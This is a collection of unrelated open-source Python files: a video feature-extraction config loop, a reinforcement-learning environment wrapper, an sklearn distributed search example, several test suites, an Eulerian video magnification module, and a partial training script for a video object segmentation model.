# `r2plus1d_v1_resnet50_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/r2plus1d_v1_resnet50_feat.yaml>`_,
# `i3d_slow_resnet50_f32s2_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/i3d_slow_resnet50_f32s2_feat.yaml>`_.
# Try extracting features from these SOTA video models on your own dataset and see which one performs better.
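######################################################################
# One way to compare several backbones is to loop over config files with
# ``subprocess``. This is only a sketch: it assumes the listed configs have
# been downloaded into ``./configuration`` and that ``feat_extract_pytorch.py``
# sits in the current directory.
import subprocess
candidate_configs = ['resnet50_v1b_feat.yaml',
                     'slowfast_4x16_resnet50_feat.yaml',
                     'i3d_slow_resnet50_f32s2_feat.yaml']
for cfg_name in candidate_configs:
    # each run writes its features to the directory given in the config file
    subprocess.run(['python', 'feat_extract_pytorch.py',
                    '--config-file', './configuration/%s' % cfg_name],
                   check=False)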
|
dizoo/gym_hybrid/envs/gym_hybrid_env.py | puyuan1996/DI-engine | 464 | 12739650 | from typing import Any, List, Dict, Union, Optional
import time
import gym
import gym_hybrid
import copy
import numpy as np
from easydict import EasyDict
from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo
from ding.envs.common import EnvElementInfo, affine_transform
from ding.torch_utils import to_ndarray, to_list
from ding.utils import ENV_REGISTRY
@ENV_REGISTRY.register('gym_hybrid')
class GymHybridEnv(BaseEnv):
default_env_id = ['Sliding-v0', 'Moving-v0']
def __init__(self, cfg: EasyDict) -> None:
self._cfg = cfg
self._env_id = cfg.env_id
assert self._env_id in self.default_env_id
self._act_scale = cfg.act_scale
self._init_flag = False
self._replay_path = None
def reset(self) -> np.ndarray:
if not self._init_flag:
self._env = gym.make(self._env_id)
if self._replay_path is not None:
self._env = gym.wrappers.Monitor(
self._env, self._replay_path, video_callable=lambda episode_id: True, force=True
)
self._env.metadata["render.modes"] = ["human", "rgb_array"]
self._init_flag = True
if hasattr(self, '_seed') and hasattr(self, '_dynamic_seed') and self._dynamic_seed:
np_seed = 100 * np.random.randint(1, 1000)
self._env.seed(self._seed + np_seed)
elif hasattr(self, '_seed'):
self._env.seed(self._seed)
self._final_eval_reward = 0
obs = self._env.reset()
obs = to_ndarray(obs).astype(np.float32)
return obs
def close(self) -> None:
if self._init_flag:
self._env.close()
self._init_flag = False
def seed(self, seed: int, dynamic_seed: bool = True) -> None:
self._seed = seed
self._dynamic_seed = dynamic_seed
np.random.seed(self._seed)
def step(self, action: Dict) -> BaseEnvTimestep:
if self._act_scale:
# acceleration_value.
action['action_args'][0] = affine_transform(action['action_args'][0], min_val=0, max_val=1)
            # rotation_value. The following line could be omitted, because
            # affine_transform already performs the clip(-1, 1) operation internally.
action['action_args'][1] = affine_transform(action['action_args'][1], min_val=-1, max_val=1)
action = [action['action_type'], action['action_args']]
obs, rew, done, info = self._env.step(action)
self._final_eval_reward += rew
if done:
info['final_eval_reward'] = self._final_eval_reward
obs = to_ndarray(obs)
if isinstance(obs, list): # corner case
for i in range(len(obs)):
if len(obs[i].shape) == 0:
obs[i] = np.array([obs[i]])
obs = np.concatenate(obs)
assert isinstance(obs, np.ndarray) and obs.shape == (10, )
obs = obs.astype(np.float32)
        rew = to_ndarray([rew])  # wrapped so that it is transformed into a numpy array with shape (1,)
if isinstance(rew, list):
rew = rew[0]
assert isinstance(rew, np.ndarray) and rew.shape == (1, )
info['action_args_mask'] = np.array([[1, 0], [0, 1], [0, 0]])
return BaseEnvTimestep(obs, rew, done, info)
def get_random_action(self) -> Dict:
# action_type: 0, 1, 2
# action_args:
# - acceleration_value: [0, 1]
# - rotation_value: [-1, 1]
raw_action = self._env.action_space.sample()
return {'action_type': raw_action[0], 'action_args': raw_action[1]}
def info(self) -> BaseEnvInfo:
T = EnvElementInfo
return BaseEnvInfo(
agent_num=1,
obs_space=T(
(10, ),
{
'min': -1,
'max': 2,
'dtype': np.float32,
},
),
# [min, max)
act_space=T(
(3, ),
{
'min': 0,
'max': 3,
'dtype': int,
},
),
rew_space=T(
(1, ),
{
'min': -1.0,
'max': 1.0
},
),
use_wrappers=None,
)
def __repr__(self) -> str:
return "DI-engine gym hybrid Env"
def enable_save_replay(self, replay_path: Optional[str] = None) -> None:
if replay_path is None:
replay_path = './video'
self._replay_path = replay_path
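if __name__ == '__main__':
    # Minimal usage sketch (not part of DI-engine itself): roll out one episode
    # of Moving-v0 with random hybrid actions. It assumes the gym-hybrid
    # package is installed so that gym.make('Moving-v0') works.
    env = GymHybridEnv(EasyDict({'env_id': 'Moving-v0', 'act_scale': False}))
    env.seed(0)
    obs = env.reset()
    done = False
    while not done:
        timestep = env.step(env.get_random_action())
        done = timestep.done
    print('final_eval_reward:', timestep.info['final_eval_reward'])
    env.close()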
|
examples/sklearn_job.py | kpavel/lithops | 158 | 12739656 | <gh_stars>100-1000
import numpy as np
import joblib
from lithops.util.joblib import register_lithops
from lithops.utils import setup_lithops_logger
from sklearn.datasets import load_digits
from sklearn.model_selection import RandomizedSearchCV
from sklearn.svm import SVC
digits = load_digits()
param_space = {
'C': np.logspace(-6, 6, 30),
'gamma': np.logspace(-8, 8, 30),
'tol': np.logspace(-4, -1, 30),
'class_weight': [None, 'balanced'],
}
model = SVC(kernel='rbf')
search = RandomizedSearchCV(model, param_space, cv=2, n_iter=50, verbose=10)
register_lithops()
setup_lithops_logger('INFO')
with joblib.parallel_backend('lithops'):
search.fit(digits.data, digits.target)
|
tests/models/test_bce_surv.py | rohanshad/pycox | 449 | 12739661 | import pytest
from pycox.models import BCESurv
import torchtuples as tt
from utils_model_testing import make_dataset, fit_model, assert_survs
@pytest.mark.parametrize('numpy', [True, False])
@pytest.mark.parametrize('num_durations', [2, 5])
def test_pmf_runs(numpy, num_durations):
data = make_dataset(True)
input, target = data
labtrans = BCESurv.label_transform(num_durations)
target = labtrans.fit_transform(*target)
data = tt.tuplefy(input, target)
if not numpy:
data = data.to_tensor()
net = tt.practical.MLPVanilla(input.shape[1], [4], labtrans.out_features)
model = BCESurv(net)
fit_model(data, model)
assert_survs(input, model)
model.duration_index = labtrans.cuts
assert_survs(input, model)
cdi = model.interpolate(3, 'const_pdf')
assert_survs(input, cdi)
|
integration_tests/test_suites/k8s-integration-test-suite/conftest.py | makotonium/dagster | 4,606 | 12739673 | <filename>integration_tests/test_suites/k8s-integration-test-suite/conftest.py
# pylint: disable=unused-import
import os
import tempfile
import docker
import kubernetes
import pytest
from dagster.core.instance import DagsterInstance
from dagster_k8s.launcher import K8sRunLauncher
from dagster_k8s_test_infra.cluster import (
dagster_instance_for_k8s_run_launcher,
define_cluster_provider_fixture,
helm_postgres_url_for_k8s_run_launcher,
)
from dagster_k8s_test_infra.helm import (
TEST_AWS_CONFIGMAP_NAME,
TEST_IMAGE_PULL_SECRET_NAME,
TEST_SECRET_NAME,
TEST_VOLUME_CONFIGMAP_NAME,
)
from dagster_k8s_test_infra.integration_utils import image_pull_policy
from dagster_test.test_project import build_and_tag_test_image, get_test_project_docker_image
pytest_plugins = ["dagster_k8s_test_infra.helm"]
IS_BUILDKITE = os.getenv("BUILDKITE") is not None
@pytest.fixture(scope="session", autouse=True)
def dagster_home():
old_env = os.getenv("DAGSTER_HOME")
os.environ["DAGSTER_HOME"] = "/opt/dagster/dagster_home"
yield
if old_env is not None:
os.environ["DAGSTER_HOME"] = old_env
cluster_provider = define_cluster_provider_fixture(
additional_kind_images=["docker.io/bitnami/rabbitmq", "docker.io/bitnami/postgresql"]
)
@pytest.yield_fixture
def schedule_tempdir():
with tempfile.TemporaryDirectory() as tempdir:
yield tempdir
@pytest.fixture()
def run_launcher(
cluster_provider, helm_namespace_for_k8s_run_launcher
): # pylint: disable=redefined-outer-name,unused-argument
return K8sRunLauncher(
image_pull_secrets=[{"name": TEST_IMAGE_PULL_SECRET_NAME}],
service_account_name="dagit-admin",
instance_config_map="dagster-instance",
postgres_password_secret="<PASSWORD>",
dagster_home="/opt/dagster/dagster_home",
job_image=get_test_project_docker_image(),
load_incluster_config=False,
kubeconfig_file=cluster_provider.kubeconfig_file,
image_pull_policy=image_pull_policy(),
job_namespace=helm_namespace_for_k8s_run_launcher,
env_config_maps=["dagster-pipeline-env", "test-env-configmap"]
+ ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
env_secrets=["test-env-secret"],
volume_mounts=[
{
"name": "test-volume",
"mountPath": "/opt/dagster/test_mount_path/volume_mounted_file.yaml",
"subPath": "volume_mounted_file.yaml",
}
],
volumes=[{"name": "test-volume", "configMap": {"name": TEST_VOLUME_CONFIGMAP_NAME}}],
)
@pytest.fixture(scope="session")
def dagster_docker_image():
docker_image = get_test_project_docker_image()
if not IS_BUILDKITE:
try:
client = docker.from_env()
client.images.get(docker_image)
print( # pylint: disable=print-call
"Found existing image tagged {image}, skipping image build. To rebuild, first run: "
"docker rmi {image}".format(image=docker_image)
)
except docker.errors.ImageNotFound:
build_and_tag_test_image(docker_image)
return docker_image
# See: https://stackoverflow.com/a/31526934/324449
def pytest_addoption(parser):
# We catch the ValueError to support cases where we are loading multiple test suites, e.g., in
# the VSCode test explorer. When pytest tries to add an option twice, we get, e.g.
#
# ValueError: option names {'--cluster-provider'} already added
# Use kind or some other cluster provider?
try:
parser.addoption("--cluster-provider", action="store", default="kind")
except ValueError:
pass
# Specify an existing kind cluster name to use
try:
parser.addoption("--kind-cluster", action="store")
except ValueError:
pass
# Keep resources around after tests are done
try:
parser.addoption("--no-cleanup", action="store_true", default=False)
except ValueError:
pass
# Use existing Helm chart/namespace
try:
parser.addoption("--existing-helm-namespace", action="store")
except ValueError:
pass
|
libtbx/tst_containers.py | rimmartin/cctbx_project | 155 | 12739687 | <reponame>rimmartin/cctbx_project
from __future__ import absolute_import, division, print_function
def exercise_oset():
from libtbx.containers import OrderedSet as oset
o = oset()
assert repr(o) == "OrderedSet()"
assert len(o) == 0
o = oset([3,5,2,5,4,2,1])
assert list(o) == [3, 5, 2, 4, 1]
assert 3 in o
assert 6 not in o
o.add(3)
assert len(o) == 5
o.add(6)
assert 6 in o
assert list(reversed(o)) == [6,1,4,2,5,3]
assert o.pop() == 6
assert len(o) == 5
assert o.pop(last=False) == 3
assert len(o) == 4
assert repr(o) == "OrderedSet([5, 2, 4, 1])"
assert o == oset([5, 2, 4, 1])
assert o != oset([5, 4, 2, 1])
assert o == set([5, 2, 4, 1])
assert o == set([5, 4, 2, 1])
o1 = oset([6, 5, 4, 3, 2, 1])
o2 = o1 - o
assert o2 == oset([6, 3])
def exercise_odict():
from libtbx.containers import OrderedDict as odict
d = odict([('banana',3), ('apple',4), ('pear',1)])
d.setdefault('orange', 2)
assert 'orange' in d
assert d['orange'] == 2
assert list(d.keys()) == ['banana', 'apple', 'pear', 'orange']
assert list(d.values()) == [3, 4, 1, 2]
d = odict.fromkeys(('b','c','a'))
assert list(d.keys()) == ['b', 'c', 'a']
def run(args):
assert len(args) == 0
exercise_oset()
exercise_odict()
print("OK")
if (__name__ == "__main__"):
import sys
run(args=sys.argv[1:])
|
docs/tests/test_images.py | victorhu3/webots | 1,561 | 12739691 | """Test module of the images."""
import unittest
from books import Books
import fnmatch
import os
import re
import sys
class TestImages(unittest.TestCase):
"""Unit test of the images."""
def test_images_are_valid(self):
"""Test that the MD files refer to valid URLs."""
books = Books()
for book in books.books:
for md_path in book.md_paths:
args = {} if sys.version_info[0] < 3 else {'encoding': 'utf-8'}
with open(md_path, **args) as f:
content = f.read()
for match in re.finditer(r"!\[(.*?)\]\((.*?)\)", content):
# remove parameters
is_youtube_video = match.group(1) == "youtube video"
image_ref = match.group(2).split(' ')[0]
if not is_youtube_video and not image_ref.startswith('http'):
image_path = os.path.join(book.path, image_ref)
self.assertTrue(
os.path.isfile(image_path),
msg='%s: "%s" not found' % (md_path, image_path)
)
def test_all_images_are_used(self):
"""Test that all the image files are referenced somewhere."""
books = Books()
for book in books.books:
# search for all images
images_paths = [] # ['image/sonar.png', 'image/sphere.png', ...]
for root, dirnames, filenames in os.walk(book.path):
if 'scenes' in root.replace(books.project_path, ''):
continue
for filename in fnmatch.filter(filenames, '*.png') + fnmatch.filter(filenames, '*.jpg'):
image_path = os.path.join(root, filename)
image_path = image_path[(len(book.path) + 1):]
images_paths.append(image_path.replace('\\', '/'))
self.assertGreater(
len(images_paths), 0,
msg='No image found in book "%s"' % book.name
)
# check the image reference can be found in at least one MD file
for image_path in images_paths:
found = False
for md_path in book.md_paths:
args = {} if sys.version_info[0] < 3 else {'encoding': 'utf-8'}
with open(md_path, **args) as file:
if (image_path in file.read() or
image_path.replace('.png', '.thumbnail.jpg') in images_paths or
image_path.replace('.png', '.thumbnail.png') in images_paths):
found = True
break
self.assertTrue(
found, msg='Image "%s" not referenced in any MD file.' % image_path
)
# in case of thumbnail make sure the original file is available
if image_path.endswith('.thumbnail.jpg'):
self.assertTrue(
image_path.replace('.thumbnail.jpg', '.png') in images_paths,
msg='Missing original file for thumbnail "%s".' % image_path
)
if __name__ == '__main__':
unittest.main()
|
eulerian_magnification/base.py | MarGetman/EM | 323 | 12739700 | import cv2
import numpy as np
import scipy.fftpack
import scipy.signal
from matplotlib import pyplot
# from eulerian_magnification.io import play_vid_data
from eulerian_magnification.pyramid import create_laplacian_video_pyramid, collapse_laplacian_video_pyramid
from eulerian_magnification.transforms import temporal_bandpass_filter
def eulerian_magnification(vid_data, fps, freq_min, freq_max, amplification, pyramid_levels=4, skip_levels_at_top=2):
vid_pyramid = create_laplacian_video_pyramid(vid_data, pyramid_levels=pyramid_levels)
for i, vid in enumerate(vid_pyramid):
if i < skip_levels_at_top or i >= len(vid_pyramid) - 1:
# ignore the top and bottom of the pyramid. One end has too much noise and the other end is the
# gaussian representation
continue
bandpassed = temporal_bandpass_filter(vid, fps, freq_min=freq_min, freq_max=freq_max, amplification_factor=amplification)
# play_vid_data(bandpassed)
vid_pyramid[i] += bandpassed
# play_vid_data(vid_pyramid[i])
vid_data = collapse_laplacian_video_pyramid(vid_pyramid)
return vid_data
def show_frequencies(vid_data, fps, bounds=None):
"""Graph the average value of the video as well as the frequency strength"""
averages = []
if bounds:
for x in range(1, vid_data.shape[0] - 1):
averages.append(vid_data[x, bounds[2]:bounds[3], bounds[0]:bounds[1], :].sum())
else:
for x in range(1, vid_data.shape[0] - 1):
averages.append(vid_data[x, :, :, :].sum())
averages = averages - min(averages)
charts_x = 1
charts_y = 2
pyplot.figure(figsize=(20, 10))
pyplot.subplots_adjust(hspace=.7)
pyplot.subplot(charts_y, charts_x, 1)
pyplot.title("Pixel Average")
pyplot.xlabel("Time")
pyplot.ylabel("Brightness")
pyplot.plot(averages)
freqs = scipy.fftpack.fftfreq(len(averages), d=1.0 / fps)
fft = abs(scipy.fftpack.fft(averages))
idx = np.argsort(freqs)
pyplot.subplot(charts_y, charts_x, 2)
pyplot.title("FFT")
pyplot.xlabel("Freq (Hz)")
freqs = freqs[idx]
fft = fft[idx]
freqs = freqs[len(freqs) // 2 + 1:]
fft = fft[len(fft) // 2 + 1:]
pyplot.plot(freqs, abs(fft))
pyplot.show()
def gaussian_video(video, shrink_multiple):
"""Create a gaussian representation of a video"""
vid_data = None
for x in range(0, video.shape[0]):
frame = video[x]
gauss_copy = np.ndarray(shape=frame.shape, dtype="float")
gauss_copy[:] = frame
for i in range(shrink_multiple):
gauss_copy = cv2.pyrDown(gauss_copy)
if x == 0:
vid_data = np.zeros((video.shape[0], gauss_copy.shape[0], gauss_copy.shape[1], 3))
vid_data[x] = gauss_copy
return vid_data
def laplacian_video(video, shrink_multiple):
vid_data = None
frame_count, height, width, colors = video.shape
for i, frame in enumerate(video):
gauss_copy = np.ndarray(shape=frame.shape, dtype="float")
gauss_copy[:] = frame
for _ in range(shrink_multiple):
prev_copy = gauss_copy[:]
gauss_copy = cv2.pyrDown(gauss_copy)
laplacian = prev_copy - cv2.pyrUp(gauss_copy)
if vid_data is None:
vid_data = np.zeros((frame_count, laplacian.shape[0], laplacian.shape[1], 3))
vid_data[i] = laplacian
return vid_data
def combine_pyramid_and_save(g_video, orig_video, enlarge_multiple, fps, save_filename='media/output.avi'):
"""Combine a gaussian video representation with the original and save to file"""
width, height = get_frame_dimensions(orig_video[0])
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
print("Outputting to %s" % save_filename)
writer = cv2.VideoWriter(save_filename, fourcc, fps, (width, height), 1)
for x in range(0, g_video.shape[0]):
img = np.ndarray(shape=g_video[x].shape, dtype='float')
img[:] = g_video[x]
for i in range(enlarge_multiple):
img = cv2.pyrUp(img)
img[:height, :width] = img[:height, :width] + orig_video[x]
res = cv2.convertScaleAbs(img[:height, :width])
writer.write(res)
def get_frame_dimensions(frame):
"""Get the dimensions of a single frame"""
height, width = frame.shape[:2]
return width, height
def butter_bandpass(lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = scipy.signal.butter(order, [low, high], btype='band')
return b, a
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5):
b, a = butter_bandpass(lowcut, highcut, fs, order=order)
y = scipy.signal.lfilter(b, a, data, axis=0)
return y
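if __name__ == '__main__':
    # Rough usage sketch, not part of the library API: it assumes 'face.mp4' is
    # a short video that OpenCV can decode. Frames are stacked into a float
    # array of shape (num_frames, height, width, 3), the layout expected by the
    # functions above, and the amplified result's shape is printed.
    cap = cv2.VideoCapture('face.mp4')
    fps = cap.get(cv2.CAP_PROP_FPS) or 30.0
    frames = []
    while True:
        ok, frame = cap.read()
        if not ok:
            break
        frames.append(frame.astype('float') / 255.0)
    cap.release()
    if frames:
        vid = np.asarray(frames)
        amplified = eulerian_magnification(vid, fps, freq_min=0.8, freq_max=1.0,
                                           amplification=20)
        print('amplified video shape:', amplified.shape)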
|
tools/__init__.py | ziransun/wpt | 14,668 | 12739703 | <filename>tools/__init__.py<gh_stars>1000+
from . import localpaths as _localpaths # noqa: F401
|
networks/managers/trainer.py | yoxu515/aot-benchmark | 105 | 12739714 | <filename>networks/managers/trainer.py
import os
import time
import json
import datetime as datetime
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.distributed as dist
from torch.utils.data import DataLoader
from torchvision import transforms
from dataloaders.train_datasets import DAVIS2017_Train, YOUTUBEVOS_Train, StaticTrain, TEST
import dataloaders.video_transforms as tr
from utils.meters import AverageMeter
from utils.image import label2colormap, masked_image, save_image
from utils.checkpoint import load_network_and_optimizer, load_network, save_network
from utils.learning import adjust_learning_rate, get_trainable_params
from utils.metric import pytorch_iou
from utils.ema import ExponentialMovingAverage, get_param_buffer_for_ema
from networks.models import build_vos_model
from networks.engines import build_engine
class Trainer(object):
def __init__(self, rank, cfg, enable_amp=True):
self.gpu = rank + cfg.DIST_START_GPU
self.gpu_num = cfg.TRAIN_GPUS
self.rank = rank
self.cfg = cfg
self.print_log("Exp {}:".format(cfg.EXP_NAME))
self.print_log(json.dumps(cfg.__dict__, indent=4, sort_keys=True))
print("Use GPU {} for training VOS.".format(self.gpu))
torch.cuda.set_device(self.gpu)
torch.backends.cudnn.benchmark = True if cfg.DATA_RANDOMCROP[
0] == cfg.DATA_RANDOMCROP[
1] and 'swin' not in cfg.MODEL_ENCODER else False
self.print_log('Build VOS model.')
self.model = build_vos_model(cfg.MODEL_VOS, cfg).cuda(self.gpu)
self.model_encoder = self.model.encoder
self.engine = build_engine(
cfg.MODEL_ENGINE,
'train',
aot_model=self.model,
gpu_id=self.gpu,
long_term_mem_gap=cfg.TRAIN_LONG_TERM_MEM_GAP)
if cfg.MODEL_FREEZE_BACKBONE:
for param in self.model_encoder.parameters():
param.requires_grad = False
if cfg.DIST_ENABLE:
dist.init_process_group(backend=cfg.DIST_BACKEND,
init_method=cfg.DIST_URL,
world_size=cfg.TRAIN_GPUS,
rank=rank,
timeout=datetime.timedelta(seconds=300))
self.model.encoder = nn.SyncBatchNorm.convert_sync_batchnorm(
self.model.encoder).cuda(self.gpu)
self.dist_engine = torch.nn.parallel.DistributedDataParallel(
self.engine,
device_ids=[self.gpu],
output_device=self.gpu,
find_unused_parameters=True,
broadcast_buffers=False)
else:
self.dist_engine = self.engine
self.use_frozen_bn = False
if 'swin' in cfg.MODEL_ENCODER:
self.print_log('Use LN in Encoder!')
elif not cfg.MODEL_FREEZE_BN:
if cfg.DIST_ENABLE:
self.print_log('Use Sync BN in Encoder!')
else:
self.print_log('Use BN in Encoder!')
else:
self.use_frozen_bn = True
self.print_log('Use Frozen BN in Encoder!')
if self.rank == 0:
try:
total_steps = float(cfg.TRAIN_TOTAL_STEPS)
ema_decay = 1. - 1. / (total_steps * cfg.TRAIN_EMA_RATIO)
self.ema_params = get_param_buffer_for_ema(
self.model, update_buffer=(not cfg.MODEL_FREEZE_BN))
self.ema = ExponentialMovingAverage(self.ema_params,
decay=ema_decay)
self.ema_dir = cfg.DIR_EMA_CKPT
except Exception as inst:
self.print_log(inst)
self.print_log('Error: failed to create EMA model!')
self.print_log('Build optimizer.')
trainable_params = get_trainable_params(
model=self.dist_engine,
base_lr=cfg.TRAIN_LR,
use_frozen_bn=self.use_frozen_bn,
weight_decay=cfg.TRAIN_WEIGHT_DECAY,
exclusive_wd_dict=cfg.TRAIN_WEIGHT_DECAY_EXCLUSIVE,
no_wd_keys=cfg.TRAIN_WEIGHT_DECAY_EXEMPTION)
if cfg.TRAIN_OPT == 'sgd':
self.optimizer = optim.SGD(trainable_params,
lr=cfg.TRAIN_LR,
momentum=cfg.TRAIN_SGD_MOMENTUM,
nesterov=True)
else:
self.optimizer = optim.AdamW(trainable_params,
lr=cfg.TRAIN_LR,
weight_decay=cfg.TRAIN_WEIGHT_DECAY)
self.enable_amp = enable_amp
if enable_amp:
self.scaler = torch.cuda.amp.GradScaler()
else:
self.scaler = None
self.prepare_dataset()
self.process_pretrained_model()
if cfg.TRAIN_TBLOG and self.rank == 0:
from tensorboardX import SummaryWriter
self.tblogger = SummaryWriter(cfg.DIR_TB_LOG)
def process_pretrained_model(self):
cfg = self.cfg
self.step = cfg.TRAIN_START_STEP
self.epoch = 0
if cfg.TRAIN_AUTO_RESUME:
ckpts = os.listdir(cfg.DIR_CKPT)
if len(ckpts) > 0:
ckpts = list(
map(lambda x: int(x.split('_')[-1].split('.')[0]), ckpts))
ckpt = np.sort(ckpts)[-1]
cfg.TRAIN_RESUME = True
cfg.TRAIN_RESUME_CKPT = ckpt
cfg.TRAIN_RESUME_STEP = ckpt
else:
cfg.TRAIN_RESUME = False
if cfg.TRAIN_RESUME:
if self.rank == 0:
try:
ema_ckpt_dir = os.path.join(
self.ema_dir,
'save_step_%s.pth' % (cfg.TRAIN_RESUME_CKPT))
ema_model, removed_dict = load_network(
self.model, ema_ckpt_dir, self.gpu)
if len(removed_dict) > 0:
self.print_log(
'Remove {} from EMA model.'.format(removed_dict))
ema_decay = self.ema.decay
del (self.ema)
ema_params = get_param_buffer_for_ema(
ema_model, update_buffer=(not cfg.MODEL_FREEZE_BN))
self.ema = ExponentialMovingAverage(ema_params,
decay=ema_decay)
self.ema.num_updates = cfg.TRAIN_RESUME_CKPT
except Exception as inst:
self.print_log(inst)
self.print_log('Error: EMA model not found!')
try:
resume_ckpt = os.path.join(
cfg.DIR_CKPT, 'save_step_%s.pth' % (cfg.TRAIN_RESUME_CKPT))
self.model, self.optimizer, removed_dict = load_network_and_optimizer(
self.model,
self.optimizer,
resume_ckpt,
self.gpu,
scaler=self.scaler)
except Exception as inst:
self.print_log(inst)
resume_ckpt = os.path.join(
'saved_models',
'save_step_%s.pth' % (cfg.TRAIN_RESUME_CKPT))
self.model, self.optimizer, removed_dict = load_network_and_optimizer(
self.model,
self.optimizer,
resume_ckpt,
self.gpu,
scaler=self.scaler)
if len(removed_dict) > 0:
self.print_log(
'Remove {} from checkpoint.'.format(removed_dict))
self.step = cfg.TRAIN_RESUME_STEP
if cfg.TRAIN_TOTAL_STEPS <= self.step:
self.print_log("Your training has finished!")
exit()
self.epoch = int(np.ceil(self.step / len(self.train_loader)))
self.print_log('Resume from step {}'.format(self.step))
elif cfg.PRETRAIN:
if cfg.PRETRAIN_FULL:
self.model, removed_dict = load_network(
self.model, cfg.PRETRAIN_MODEL, self.gpu)
if len(removed_dict) > 0:
self.print_log('Remove {} from pretrained model.'.format(
removed_dict))
self.print_log('Load pretrained VOS model from {}.'.format(
cfg.PRETRAIN_MODEL))
else:
model_encoder, removed_dict = load_network(
self.model_encoder, cfg.MODEL_ENCODER_PRETRAIN, self.gpu)
if len(removed_dict) > 0:
self.print_log('Remove {} from pretrained model.'.format(
removed_dict))
self.print_log(
'Load pretrained backbone model from {}.'.format(
                        cfg.MODEL_ENCODER_PRETRAIN))
def prepare_dataset(self):
cfg = self.cfg
self.enable_prev_frame = cfg.TRAIN_ENABLE_PREV_FRAME
self.print_log('Process dataset...')
composed_transforms = transforms.Compose([
tr.RandomScale(cfg.DATA_MIN_SCALE_FACTOR,
cfg.DATA_MAX_SCALE_FACTOR, cfg.DATA_SHORT_EDGE_LEN),
tr.BalancedRandomCrop(cfg.DATA_RANDOMCROP,
max_obj_num=cfg.MODEL_MAX_OBJ_NUM),
tr.RandomHorizontalFlip(cfg.DATA_RANDOMFLIP),
tr.Resize(cfg.DATA_RANDOMCROP, use_padding=True),
tr.ToTensor()
])
train_datasets = []
if 'static' in cfg.DATASETS:
pretrain_vos_dataset = StaticTrain(
cfg.DIR_STATIC,
cfg.DATA_RANDOMCROP,
seq_len=cfg.DATA_SEQ_LEN,
merge_prob=cfg.DATA_DYNAMIC_MERGE_PROB,
max_obj_n=cfg.MODEL_MAX_OBJ_NUM)
train_datasets.append(pretrain_vos_dataset)
self.enable_prev_frame = False
if 'davis2017' in cfg.DATASETS:
train_davis_dataset = DAVIS2017_Train(
root=cfg.DIR_DAVIS,
full_resolution=cfg.TRAIN_DATASET_FULL_RESOLUTION,
transform=composed_transforms,
repeat_time=cfg.DATA_DAVIS_REPEAT,
seq_len=cfg.DATA_SEQ_LEN,
rand_gap=cfg.DATA_RANDOM_GAP_DAVIS,
rand_reverse=cfg.DATA_RANDOM_REVERSE_SEQ,
merge_prob=cfg.DATA_DYNAMIC_MERGE_PROB,
enable_prev_frame=self.enable_prev_frame,
max_obj_n=cfg.MODEL_MAX_OBJ_NUM)
train_datasets.append(train_davis_dataset)
if 'youtubevos' in cfg.DATASETS:
train_ytb_dataset = YOUTUBEVOS_Train(
root=cfg.DIR_YTB,
transform=composed_transforms,
seq_len=cfg.DATA_SEQ_LEN,
rand_gap=cfg.DATA_RANDOM_GAP_YTB,
rand_reverse=cfg.DATA_RANDOM_REVERSE_SEQ,
merge_prob=cfg.DATA_DYNAMIC_MERGE_PROB,
enable_prev_frame=self.enable_prev_frame,
max_obj_n=cfg.MODEL_MAX_OBJ_NUM)
train_datasets.append(train_ytb_dataset)
if 'test' in cfg.DATASETS:
test_dataset = TEST(transform=composed_transforms,
seq_len=cfg.DATA_SEQ_LEN)
train_datasets.append(test_dataset)
if len(train_datasets) > 1:
train_dataset = torch.utils.data.ConcatDataset(train_datasets)
elif len(train_datasets) == 1:
train_dataset = train_datasets[0]
else:
self.print_log('No dataset!')
exit(0)
self.train_sampler = torch.utils.data.distributed.DistributedSampler(
train_dataset)
self.train_loader = DataLoader(train_dataset,
batch_size=int(cfg.TRAIN_BATCH_SIZE /
cfg.TRAIN_GPUS),
shuffle=False,
num_workers=cfg.DATA_WORKERS,
pin_memory=True,
sampler=self.train_sampler,
drop_last=True,
prefetch_factor=4)
self.print_log('Done!')
def sequential_training(self):
cfg = self.cfg
if self.enable_prev_frame:
frame_names = ['Ref', 'Prev']
else:
frame_names = ['Ref(Prev)']
for i in range(cfg.DATA_SEQ_LEN - 1):
frame_names.append('Curr{}'.format(i + 1))
seq_len = len(frame_names)
running_losses = []
running_ious = []
for _ in range(seq_len):
running_losses.append(AverageMeter())
running_ious.append(AverageMeter())
batch_time = AverageMeter()
avg_obj = AverageMeter()
optimizer = self.optimizer
model = self.dist_engine
train_sampler = self.train_sampler
train_loader = self.train_loader
step = self.step
epoch = self.epoch
max_itr = cfg.TRAIN_TOTAL_STEPS
start_seq_training_step = int(cfg.TRAIN_SEQ_TRAINING_START_RATIO *
max_itr)
use_prev_prob = cfg.MODEL_USE_PREV_PROB
self.print_log('Start training:')
model.train()
while step < cfg.TRAIN_TOTAL_STEPS:
train_sampler.set_epoch(epoch)
epoch += 1
last_time = time.time()
for frame_idx, sample in enumerate(train_loader):
if step > cfg.TRAIN_TOTAL_STEPS:
break
if step % cfg.TRAIN_TBLOG_STEP == 0 and self.rank == 0 and cfg.TRAIN_TBLOG:
tf_board = True
else:
tf_board = False
if step >= start_seq_training_step:
use_prev_pred = True
freeze_params = cfg.TRAIN_SEQ_TRAINING_FREEZE_PARAMS
else:
use_prev_pred = False
freeze_params = []
if step % cfg.TRAIN_LR_UPDATE_STEP == 0:
now_lr = adjust_learning_rate(
optimizer=optimizer,
base_lr=cfg.TRAIN_LR,
p=cfg.TRAIN_LR_POWER,
itr=step,
max_itr=max_itr,
restart=cfg.TRAIN_LR_RESTART,
warm_up_steps=cfg.TRAIN_LR_WARM_UP_RATIO * max_itr,
is_cosine_decay=cfg.TRAIN_LR_COSINE_DECAY,
min_lr=cfg.TRAIN_LR_MIN,
encoder_lr_ratio=cfg.TRAIN_LR_ENCODER_RATIO,
freeze_params=freeze_params)
ref_imgs = sample['ref_img'] # batch_size * 3 * h * w
prev_imgs = sample['prev_img']
curr_imgs = sample['curr_img']
ref_labels = sample['ref_label'] # batch_size * 1 * h * w
prev_labels = sample['prev_label']
curr_labels = sample['curr_label']
obj_nums = sample['meta']['obj_num']
bs, _, h, w = curr_imgs[0].size()
